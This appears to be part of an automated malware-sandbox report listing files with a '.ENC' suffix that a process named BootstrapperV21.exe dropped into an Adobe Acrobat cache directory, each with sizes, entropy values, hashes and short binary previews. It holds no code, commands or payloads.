                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):224
                                                                                        Entropy (8bit):7.130351616290866
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:8N5d7yKdSfaYtk2Z+/ULy897s09UkIe8Xjrw/bh:8vByKdSSYtHvy8qJTjrw/bh
                                                                                        MD5:56DAA3203982C38273ED3CA8252B057E
                                                                                        SHA1:A526A2B064C94781ADFBE7FC92B5981D385A09B1
                                                                                        SHA-256:12E822CFC8EA55DE6C6FEC384BD552B4E8D46E9CBD22387DE2DC02AA7EEEA813
                                                                                        SHA-512:0218BB9923708A7D415D09472058D26A0277A3FA08CA9F36F352E4CFC8F035C284E106335560C9BD6FE096B2466D84A244D6A10E3DB5B7E140BBA4AA6ED4DD98
                                                                                        Malicious:false
                                                                                        Preview:....:..j.A....EwnuT........Qo8..td)y.T83[.FL.A....zhZJh.i.....z.$....;.Kgrc..u.D./..@8.p.W#X.v..]d4.9..:.._.-.3pr...5...=o.... i...Wa...<..dp8..x....... W..8.....}q. .wIJ\G....HA.s...Q<..x...C.g&.G.I..R../....V.~.Y..

                                                                                        C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\bba29d2e6197e2f4_0.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):224
                                                                                        Entropy (8bit):7.1329859487273986
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:i8FHLT8KWAtmOAJtEv09BN6ILVmOLV24n:i8FrYAtmVJtDZLAY24n
                                                                                        MD5:9303B8C1E1FB3F0411D8EF2291271104
                                                                                        SHA1:757915797A9264F69259F1352511D34739919750
                                                                                        SHA-256:BA86239205D5F71AC4C3E449578B8B8D805850FFD7BFA78CA469E0C987F9D882
                                                                                        SHA-512:EC5E97376B9A8F431A16F01773868595D1DF725A6DDC8CF6C8AC005EB5C4AFD0CC53975DC94FD27B5E1EBE3D01D4E2DF9C3757B855D06ED85EF4197CBCB6D234
                                                                                        Malicious:false
                                                                                        Preview:.Z...h....Nn.]_t.5y:...c..L....R..h.,.'.it.A..G..4.e.d(@..e1........ZQ...Gob.X=.../}HWj.u.T...#$...iahu.%.IG. .E.H..F..E.4.g<.a.e...~x.Qg\..0.\Pk..Qu....{.K.{3..W).D.6[|.<...tfj.Mo.(1....F..pS.d.9.S..6.........'%.Z.B,

                                                                                        C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\bf8eae3dcaf681ca_0.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):224
                                                                                        Entropy (8bit):7.100195868513353
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:fe8ntxGDYHmNqLvAOPkDWLzG+iSjdf+Cgy0h+du6aZ6n:ln/GDmvAO+uC+pt+C/0h+khg
                                                                                        MD5:BD5A49A89517051F6E1E6E8B0AFD29C9
                                                                                        SHA1:95C56254EB097E30E8F7948B63264AC12A76A005
                                                                                        SHA-256:A65FB59A697B54033A5C14B6249DAA558C6F8F93E00DF0846E0F89188BC5104B
                                                                                        SHA-512:C01FF5F86D7B8DA8FF11C0496EA888AC21252DFBB972C62084BA1AEE63ED3963C85A6F67F36C3B820CB2F1BC4B4AA48D35D1545E5A9E92CEFAF653C7CC316015
                                                                                        Malicious:false
                                                                                        Preview:u..`.-....C'......S...(..........g..q.~."...........<B.S....M.%..0aD..[..E.<6..Kt9M.a.n..e._..Q..JN..L!{e+...r.x..-`f.......7....T.g..y...^.j.\..]I*..a.VB....!7.s..H ,.w-i'.jo..Q..".. l.@.....I.....nh..90..l..\

                                                                                        C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\cf3e34002cde7e9c_0.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):224
                                                                                        Entropy (8bit):7.085708759148012
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:c1mE8Cu2l3aTQyBBmR1A5bwsqQt++gPjc:0XuM3aTHB02esF7gLc
                                                                                        MD5:1F1D9492475672E90F172F17D5B459CF
                                                                                        SHA1:6876D5413808D805E7776177764F6AE6BCB735D6
                                                                                        SHA-256:4558546E6F98DAB45BF3DCEEB6BB68496A847EBE186A4221948FBB62C4150E24
                                                                                        SHA-512:22906D22D80D5E6D2441A0952F2E4507EA7764E185037896A10A7014F6A625E846E37AD43EC67F4DFF67504522048CFAEAF463710CAD5B9C4083AB7C5D2A0822
                                                                                        Malicious:false
                                                                                        Preview:..d...2.X.b.....$.T....g.w..6L3.c.-.z..!..|H.;"...kl`oFo.@c..t{.ioS.;...I.gP....^+....b..\..v.*...vc.e~y].V..<..=....:..5..........TY...C.M...".'8.S\....x:.......hi.$....$x....j.V...$..g3.z.o...>...C?.g,i.P.#f}.B...

                                                                                        C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\d5dedf551f4d1592_0.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):224
                                                                                        Entropy (8bit):7.137537511266033
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:i8F38KvUp7E7tlXPxowWS60dkZc1zmUqA:i8F380e7Ejf6G60ndmLA
                                                                                        MD5:FE52D1CC33A5E78A9BCFDC3940CADD37
                                                                                        SHA1:700825E26002B57043911A821B0DAD001F130172
                                                                                        SHA-256:04CBBAE7D5B524861C5FBFE311A35683BA05B40BAAFD8E27DD2807E741E8F8AB
                                                                                        SHA-512:7A10608B77EA3FF4590C6320ED40C907C1CF2BB4B802B9419DA78F1E1CFC4A620C0611FEA630132C411067EA46922A41F49956B54108EF6BC2536ADF35322351
                                                                                        Malicious:false
                                                                                        Preview:.Z...h....Nn.]Rq.b....#..|....5.j....1..F...@...]..Mc...w..J.'...._.+z<..BVo{..~........6..oX. ..M.....4g.9..X.......[n.':.....3.U...K_..........uS......vp.....D..]..o.1..\.......V....Q.?.=YR....='...W..uo.{..e

                                                                                        C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\f0cf6dfa8a1afa3d_0.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):224
                                                                                        Entropy (8bit):7.039148671903055
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:c1mEMWgnLTndkhEXdv9bhwbdbudHjorzTC:0+WgnHyiXdVbmUdHjwPC
                                                                                        MD5:C73E79650A2AF19A868FE316B051D6AC
                                                                                        SHA1:550B1F1F278904691E106C95823D478572660C86
                                                                                        SHA-256:6662D4EB49945340AFD9C2DEEB6A4A4865AFED4D96E9A18CFE8611D38226F82F
                                                                                        SHA-512:8A85F2C6D03068CF9A3D5D13114DCE83C32FB024B0D1E6ED76EE9CE80721AFC5BE19076DD3E608123483A7193655E40D25FFBF845FBA51B9EDB56A867C56A7A2
                                                                                        Malicious:false
                                                                                        Preview:..d...2.X.b........ . ..]..`rV.u...w.;#K..;..@..X...".#..6...{.......'....W]F?...]..T[P`...b..e..3Y7.w..tY..Z..n...U.......MW{7K.4............X*.(\.*D.AZ*..E.....2....O.^..s.k]....Nq'.....`.....T.[QR..F..%.........\.

                                                                                        C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\f941376b2efdd6e6_0.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):240
                                                                                        Entropy (8bit):7.118043460056653
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:VtjXsR0aCHwnR1HLmYzjEGHWPDofZFHmBrManNP:Hrw0aCuHrT2BnNP
                                                                                        MD5:1A924377E3628CEF277384F880089E3E
                                                                                        SHA1:F897209918EE2D9D2E6C1B8B64FA376E08E1B514
                                                                                        SHA-256:E93F64A4432B74282455C8C4FDD6FDB8B778208448836E5E46041025D101693D
                                                                                        SHA-512:FC8531FE5DC049607CBE1D405E48F4231BF42744D7974A0262A4CE92E7682E70E682E352CAC203F1E644E45FB68AF063B10BBD92E4DCC673D9E0BF6DF4EB3D4C
                                                                                        Malicious:false
                                                                                        Preview:..i......_....;...p...4~..\.i...z.KU..f+8....*.X..zp.P..T.3..k...J~..\.\....H...g[..<.[B6Ph&R..*..0$.....jr....j7.?..UD..Md0M....,...*w..7KY|..4..P........A.P..cw%.y..<^<.....E.s.....=?3I.?..`.JECR.....hKut..9|j.=.....:.?.U.

                                                                                        C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\f971b7eda7fa05c3_0.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):224
                                                                                        Entropy (8bit):7.102830200949884
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:uXA5gr3iMIhkW9828/mQFo8Vu2CM2xCi0vDCEYkM2uMscWeqL5tE9t+FVC+RVL8o:umu+t9D4mQun0vDZULFOd1m1LVnn
                                                                                        MD5:328955712D68C055BFBCBC02C9FA4ED4
                                                                                        SHA1:D2B66A26FF5E3A47B76FF1287703F849F8816230
                                                                                        SHA-256:DB85B68BB9E93DC365E61E126D215AB164AD83273C329C1AA1798A6CBE602344
                                                                                        SHA-512:551A9EC3A9C55A53D5A9AB9F75853202CCE5AD83A84084B5475F5DF604469C947D59540B2F96EB16F3FC1896D7E49089E72E5C4B7DAF9C03C24982F99F9DC218
                                                                                        Malicious:false
                                                                                        Preview:.Idr......_.)"%.\..Y.o.m..8...1B,.Zi...:.z.d..Y3..B$N...A2.O......NKY.|.z.L......S-I<...........#.....#.....5X........[i7...GN.7.k.....T..B......_D..9.}.}....MG..y...U.o..j....=..u...A.x3...A.t.O#P.M....|n.U.

                                                                                        C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\fd17b2d8331c91e8_0.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):224
                                                                                        Entropy (8bit):7.003163111845901
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:H30KZLnvRDamzy2w68NSY7bntjv+LgfLD31YpYdtQ9g2wutkr:X0KZNDru2PJWDtBnWYdGtkr
                                                                                        MD5:FEBEEE6B4ABD43E3C68D9366D439CE50
                                                                                        SHA1:A26117974D7D02CE9288004D5E97CE213567ABB2
                                                                                        SHA-256:C09F6382BFBADE6B98363A675FA824814FFC60777511C86402D015DCBC0DF2EC
                                                                                        SHA-512:929765F24EDE50A430C6B6B8210CDDA89E9F08E078024BD888FD2B5BA16BC25D76E2857B2EB9458A30C106F326DBC26F2D37881E192FF38BD6F1B9CC61671720
                                                                                        Malicious:false
                                                                                        Preview:<.,.Q.Z!'.....J...}..O.<Uu...5....%8..[.m.[.....3.Hv.G_A..[.E....)4..A.}.F/tR..}_.u.SgD..'A@...H.N7..{.K.....n..-..<fz......_.\...01:3-.L...u.,Y.../...........=...<W... H.c...e..E:./.a./x..}..8.[.t.C.R.S..H...;F..%l

                                                                                        C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\febb41df4ea2b63a_0.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):240
                                                                                        Entropy (8bit):7.040421833043774
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:6Bi0pd940mem8TLiiUT370qtg8ubBOdgG3v10LIMnvbXR4ZIuHqJ5IcI:6S8nijokfuQ3N0nvbB4uuHqJKcI
                                                                                        MD5:8766D47F82B40A92526CBA0408918C05
                                                                                        SHA1:A5E3CA507957BCC767A5E2CE6799F738208D38C7
                                                                                        SHA-256:37F6F304972F778429581E1D70AAC5056D4351F833DEDA46C89BC560B57C3312
                                                                                        SHA-512:D4FEC6988F178A37F08A38CA2389EE03F060F13E6B1F5BD6F8A2E39F5EEC0E866FF659329D73EAF9882AE0AABBAD77493931F835DC3C6C81FC79A53A2134E6AD
                                                                                        Malicious:false
                                                                                        Preview:.j......|...4a..f]...Y./.h...REuY.x../....X..g...(..e........t..jYE...C.c...c..M...tY......1t.....)PG....Cx.....5'E...W...5.b.1x....=...S.FD.=....Z.....#Ho.<......P5Q...z>../.HQH4P.....=.3..<..a...AKMF.}.l{Y.K.M....".eS

                                                                                        C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\index-dir\the-real-index.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):928
                                                                                        Entropy (8bit):7.790187813245086
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:aVXQDHtl7Yca0SfgLkUvz0IDYRuzY/Q3aGkTpNnQnN:JHP7sfILrL0+k//KadnQnN
                                                                                        MD5:13076DCD2345CB5A18629A056258AC10
                                                                                        SHA1:FDF951F9DA907C66F018405BD3C410478C4ED8EF
                                                                                        SHA-256:65F2D594F73094F2DA269BE7A0B38ED4F5CE73F639BEAF1BD422C431B844C8AD
                                                                                        SHA-512:E7434375E37A393A1257A2D41F2F113289FBC79E6473F4507624B0160EE3093C12C05778E323ABFEA7F068E7742E25DCB3148EC769914DC7AFE2EAED9ED96A6D
                                                                                        Malicious:false
                                                                                        Preview:..U.f/.Lv....R....8..XU+U*...o..c.EW.5...*..u:.w....%..K/..#W3..O.1v......g..1O.].6..n.'.G....iD....7..p.>._....V..{.ZX.&l.H.....F.r|....4ZhI0\...KzZN.rd..iO....h...=V.W....')....e(...F.Q...6R...4m.8.6...p..c'..rU.....,..4O...xk:..l...o..!...m.....l.*>.....~...@...H.n......\.G.F`!....7.KA.8. .".r8....$.-#..\Bk..c....(.Y,xE..`+....=.p.T....r...}.cy.. PRy.x....E..Fz..U....:..J1t`M.....1.......R.ba...+.%+...'B....T.. .6......^.W.f`t..m.JAh.'...t.vdD..f...'Su6.X.\..........z..}...aE.@.E..x...2Z>...4.0.......-.......r.u...B.v....Z9 .@z~.d....'..e ~.GR....[..a.d.._...<VZ.AAo....x9.....R=34..?.I..w7"O'Z0.8.hc5!..jJ..#.6...g5.3.9c.5.o...Me...)..z."k..:l..oT4.]P...J.O.?.|m.v.p$.RW.n6.|......c~uxM.y.....#l5..&=..Uj<..Q.[0..i+EG...c..6l....0...M.~.,.C...=>B.......M....r...Q....L.....oI"..+i .];.f....t.8cf6.e...=..p...h.raxF..35.0N../....F..?~.C*0]=.......:..QNO.......7.u".

                                                                                        C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\index.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):32
                                                                                        Entropy (8bit):4.9375
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:TSkpJVBY77G:lpJVBY77G
                                                                                        MD5:54C9508A5F0A87FFB3ADD17DE1166734
                                                                                        SHA1:8ADA283201B49E5164B2E99EFAE5480A15DC2249
                                                                                        SHA-256:A7CC0741B469308327BA9FC2C373476437B8D9DFE35B6DC395B6DD825CB5B292
                                                                                        SHA-512:002904D3CFFDDD9D9F3C88500A40095635DB4560CAEEDF5A7882003BED3538CE9DAC298E6F0C6BEC6E570FE040AC85D40B98BA633870EECBD42FBBD73ACF397B
                                                                                        Malicious:false
                                                                                        Preview:.SkYWu.....U...]k.f.*..=9.....

                                                                                        C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\wasm\index-dir\the-real-index.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):64
                                                                                        Entropy (8bit):5.875
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:kNsvJFKtc4xanyCiYcw4n:kNVu4xsyCfc1n
                                                                                        MD5:C95AC0140D7B3253E7620B53A3B82E09
                                                                                        SHA1:7A2112AF7282F7A4DC37FD02D99BCAE570BDD4C0
                                                                                        SHA-256:0527AAA5D4E8F2920108343524F5827CFF4DDFFFA755A0036B0CAE590C20D077
                                                                                        SHA-512:1B48A3C4D54796B4DFC9B74FA493F5D706B38979A1A8C3C9779C08BC8D4D6C2A4C53339072A7BE57E213AD8A7D9091BF2F5E123367FEF1A5D8E1F6B95DFF092A
                                                                                        Malicious:false
                                                                                        Preview:...z..Js\.Lx.:}..S....c....o.9.B......3`.'.0'..p}.....t...7.

                                                                                        C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\wasm\index.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):32
                                                                                        Entropy (8bit):4.9375
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:TSkpJVBY77G:lpJVBY77G
                                                                                        MD5:54C9508A5F0A87FFB3ADD17DE1166734
                                                                                        SHA1:8ADA283201B49E5164B2E99EFAE5480A15DC2249
                                                                                        SHA-256:A7CC0741B469308327BA9FC2C373476437B8D9DFE35B6DC395B6DD825CB5B292
                                                                                        SHA-512:002904D3CFFDDD9D9F3C88500A40095635DB4560CAEEDF5A7882003BED3538CE9DAC298E6F0C6BEC6E570FE040AC85D40B98BA633870EECBD42FBBD73ACF397B
                                                                                        Malicious:false
                                                                                        Preview:.SkYWu.....U...]k.f.*..=9.....

                                                                                        C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\LOCK.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):16
                                                                                        Entropy (8bit):3.875
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:IHqDN92:IG92
                                                                                        MD5:2565D7AECCCC6B4348A2AC92A832D139
                                                                                        SHA1:4910F888F11EB5A037174F44BEBACBB0E9C716A0
                                                                                        SHA-256:F4C801F49CB6A7BA90D7DB65AEB50909352766F322F38FB2BC93378199E237EF
                                                                                        SHA-512:507EDED3D39F310579A7604060D4386C5B89505671BEE1D012FCACA669CF1622AA2B21C0CD46C2E563B535B9F7EC7644264F7A8138E367A67D0D3AF222AD9D22
                                                                                        Malicious:false
                                                                                        Preview:.@.w.D*.3o.i.7

                                                                                        C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\LOG.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):288
                                                                                        Entropy (8bit):7.2759587583177625
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:ssY5n65R+pRe0qrZpuZt5Lqv14YsGo/ijMzx7:pt+pY/NUZtUYYg7
                                                                                        MD5:809F986086602E7DD65FED0F260E07F6
                                                                                        SHA1:5D124B87308EBC8607241CD5D6A6EAEB6B46DB0E
                                                                                        SHA-256:0E365A414395DA4C7C6C8EFAB3E91E75D0F6A532A485F7C0EE2129A7FCBC986D
                                                                                        SHA-512:6FEBDB0CC76FD1C0BED0690A8013D26E36CB2D79A75424C7E714C97477E318D73BB9F923AF7A81460B9818B944C720189E876E5B266BFFDCFCBD1462F86FF943
                                                                                        Malicious:false
                                                                                        Preview:._O.Hh..]$}.9.H.L.v;.v.9.c.&...c....|M.......:~.n..7..}l.1..?.T;\.}....4P.......M.....x..Q.d.tB..x...1.x9.......V.[.....~..a..1FQi.N..'.k..F`.W3..w2..)[.ZH .!...}.^[.z..g...(z%,n...J..a....hJ...%.7.=t=B....!..1...g..{.ew#.\).8v.mz.M~.ts. .M.lT...a.^f._..M...V./>bl....;......

                                                                                        C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):256
                                                                                        Entropy (8bit):7.153096656297595
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:XchNgWP2DC/DUUMfk5Qlhf69wZP+2+SSx2/qXeW9HNN:XcfgW+e/DUc5Q3f69wxE2/VW9HNN
                                                                                        MD5:374C15CEF89CF5D0A400A0CF1AB2C303
                                                                                        SHA1:8033EAA07D7C96685D97984F4B7B80EADE569F76
                                                                                        SHA-256:5DE1BE3414ABF54C146F8B5EA03D5A41976F1DFAAD18691A013A47C83930FE7E
                                                                                        SHA-512:3D91038018D27DA3FB080C764C86A81D8B781CD0E2A5513126557E35580BA95D064579936C16F0671F68D33F348C94005535FCE5BEA3C4E8535784CC7666042B
                                                                                        Malicious:false
                                                                                        Preview:.]j..(-.Y.Z.-[.E|.[.........K>.Op.+..R..../J.b..A.+}x.ln..M@7..UK...L.-....*..&........&.VHfw.."..z."..qvgw.E.g...G..M".v...iNz..j.]az>..H..!.tZ..%.i../..M....U@.Y..6T.X..}..K~z\......O$....=8...-)!.....l4.]^z.#.......t...S...i....&C{...{.W.0 ..>8.w.

                                                                                        C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\000003.log.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):16
                                                                                        Entropy (8bit):3.875
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:IHqDN92:IG92
                                                                                        MD5:2565D7AECCCC6B4348A2AC92A832D139
                                                                                        SHA1:4910F888F11EB5A037174F44BEBACBB0E9C716A0
                                                                                        SHA-256:F4C801F49CB6A7BA90D7DB65AEB50909352766F322F38FB2BC93378199E237EF
                                                                                        SHA-512:507EDED3D39F310579A7604060D4386C5B89505671BEE1D012FCACA669CF1622AA2B21C0CD46C2E563B535B9F7EC7644264F7A8138E367A67D0D3AF222AD9D22
                                                                                        Malicious:false
                                                                                        Preview:.@.w.D*.3o.i.7

                                                                                        C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\CURRENT.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):32
                                                                                        Entropy (8bit):4.663909765557392
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:5ssJHQOOsaVI0n:sOOJVI0n
                                                                                        MD5:707AA11AE4BB330C8FF4314ACCAB2D75
                                                                                        SHA1:8C63AAB10596784BFA694B7B38037CC21816F34E
                                                                                        SHA-256:0BCACBFFF916D3547AF4BB7375ACDA894F9885940E91146695E21174B2A5F927
                                                                                        SHA-512:2F0645A35797DDACF1A058B399E4BF3C2FBA61C1C09E874DD6E1C14669C4BB2A12CEB117F72BB5630D73FCF99289DA94E5B36126EEEF73F9D9881968AC50B4E3
                                                                                        Malicious:false
                                                                                        Preview:........W..j..+.....`3.S.W...

                                                                                        C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOCK.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):16
                                                                                        Entropy (8bit):3.875
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:IHqDN92:IG92
                                                                                        MD5:2565D7AECCCC6B4348A2AC92A832D139
                                                                                        SHA1:4910F888F11EB5A037174F44BEBACBB0E9C716A0
                                                                                        SHA-256:F4C801F49CB6A7BA90D7DB65AEB50909352766F322F38FB2BC93378199E237EF
                                                                                        SHA-512:507EDED3D39F310579A7604060D4386C5B89505671BEE1D012FCACA669CF1622AA2B21C0CD46C2E563B535B9F7EC7644264F7A8138E367A67D0D3AF222AD9D22
                                                                                        Malicious:false
                                                                                        Preview:.@.w.D*.3o.i.7

                                                                                        C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):336
                                                                                        Entropy (8bit):7.288090472194314
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:uyy59VYhwy/CInOCwWeRuQLEgElaNhsJM5k+a7ymmZ1PlthQqOCOnj2BiiG:9eDInpaRvqksa+tmHKlI6
                                                                                        MD5:5FB5CE882FA170F5EBD6282788AB7639
                                                                                        SHA1:B3FF919DB05D82B408C3AF0AFA477961EB2E589E
                                                                                        SHA-256:FAD9AF3DD779CC1A8C6FA99A194FD741F218E72D33AADFA7EFFC10419E2E247B
                                                                                        SHA-512:EDC6E17E96BEBBB5DE5221A9446859BBB24EC6958C57B5AD89606FB11BF3567447BA5E4DB5336169179E6B000369D8D608027BB44CCD03F26601DD60AA4D04E3
                                                                                        Malicious:false
                                                                                        Preview:._O.Hh..]$}.9.H...]T...V...g..J....J.3X..S.D.w..Ev.;.K.&....3.zQ..7C=..m@.6..D....nvH.JH.........rq%...+..=}K.C.".......,.9X...G9.....0.<...A~UV.i...g..<.l...(..D.BUC{ ..%T..ByU.\.....h'Cj.%syJ.O.WPZ......N.Z...V....~u..h..>...,.V..O...3....%...H~3...8.W*f.1_......DR...n..`...1X.^.+.lv...!..af...B.....t...*$....N..A.pV./.

                                                                                        C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):304
                                                                                        Entropy (8bit):7.296024799691066
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:Xeqvcr7sD1sPM+h1h7uHf91lFsqDB3Sas1e86qP46NRvPTbzn:XeqCoD1M/qfnrsqDB8oDgp3vLbz
                                                                                        MD5:46C25D962076F2CBA8D940D3F23E3901
                                                                                        SHA1:D8D58B285F6682B90E0DCF8B5F022EC4B17C15E5
                                                                                        SHA-256:E9C3DB6111924706CB6FF72A990B1AA5CEDB3B88E4248C22732559AF8960C34E
                                                                                        SHA-512:8D0AFE777B1D25BA97BCD5FC1A4776B8AD29A9915035EE99E7B0AEB2C37470A355BB20E2EAFA577187AA7AD00CCB1D96CF71D3032345C5BA3FAC7EECAED9F961
                                                                                        Malicious:false
                                                                                        Preview:.]j..(-.Y.Z.-[.E.t._.n.....:P.x.|.`.9..S.g..%D..r0...yW#.[..o.G.8..Ci:.$.CG..L......,...4.f........B*..E........*a}.)n1...a.*.#8...l.}.u.:.l...*n.~.F..y..w...9m...w.......s..i..c...j.".|....Z....-.0.Y.6s..\{:......%L.0.=.XH.........`...o5..h3i.3.,.%..T.m.?.[.......3.7oQ.....?...p?...d...U

                                                                                        C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\MANIFEST-000001.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:OpenPGP Public Key
                                                                                        Category:dropped
                                                                                        Size (bytes):48
                                                                                        Entropy (8bit):5.4599625007211605
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:r+OqThprQ6wbNcbVwOmH6:rQT/rGapwOl
                                                                                        MD5:17AF1BA22030E9228BD4A1DBA5228358
                                                                                        SHA1:A1B5AB3ED8F29BFA797B1CAE12B89A670DC8120D
                                                                                        SHA-256:72C739CEF90F4A749CCDDD581705440E4AEEF7A41730B9447ECA19362DAB3906
                                                                                        SHA-512:914484A3F247D789EF6BCA79FDEFEC0EC8F519A4042B34F3F6D3CB5BB59355A9D1F8742D69187E0370BAFC01324309A3153A4CCDC3831DB8C7D0CC4902D1FC23
                                                                                        Malicious:false
                                                                                        Preview:.B.i.x.+.Q.....+JP.....<.f_.N*.:.-.#g.....("..

                                                                                        C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\LocalPrefs.json.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):496
                                                                                        Entropy (8bit):7.5691903843909625
                                                                                        Encrypted:false
                                                                                        SSDEEP:12:pzceVfH7R+swkUyuIiJypjViQNIJ4d6E3PE7bTvgUff:5/ZlwJCiJypzUzaSbTPX
